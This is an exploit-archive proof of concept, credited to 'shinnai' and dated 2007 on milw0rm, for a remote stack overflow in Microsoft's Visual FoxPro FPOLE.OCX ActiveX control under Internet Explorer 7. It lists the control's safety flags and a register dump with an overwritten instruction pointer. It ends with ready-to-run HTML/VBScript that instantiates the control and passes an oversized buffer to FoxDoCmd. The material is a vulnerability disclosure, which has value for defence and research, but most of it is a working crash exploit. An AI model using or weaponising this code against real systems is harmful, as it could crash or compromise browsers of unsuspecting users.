<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------------
<b>0-day: Microsoft Visual FoxPro 6.0 fpole 1.0 Type Library (FPOLE.OCX v. 6.0.8450.0) Remote Stack Overflow</b>
url: http://www.microsoft.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
This control is marked as:
<b>RegKey Safe for Script: Falso
RegKey Safe for Init: Falso
Implements IObjectSafety: Vero
IDisp Safe: Safe for untrusted: caller
KillBitSet: Falso</b>
This is a dump:
EAX 000287C4
ECX 017923C8
EDX 017FC60D ASCII "bbbbbbbbbbbb..."
EBX 04E51ED8
ESP 017FC3C0
ESI 000493E1
EDI 7C80BDB6 kernel32.lstrlenA
EIP 04E46807 FPOLE.04E46807
017FC60C |62626262
017FC610 |62626262
017FC614 |62626262
017FC618 |62626262
017FC61C |62626262
so I think code execution is possible even if, in this moment of my life, I really have no time to
investigate :)
<object classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe()
buff = String(300000, "b")
test.FoxDoCmd buff, 1
End Sub
# milw0rm.com [2007-09-06]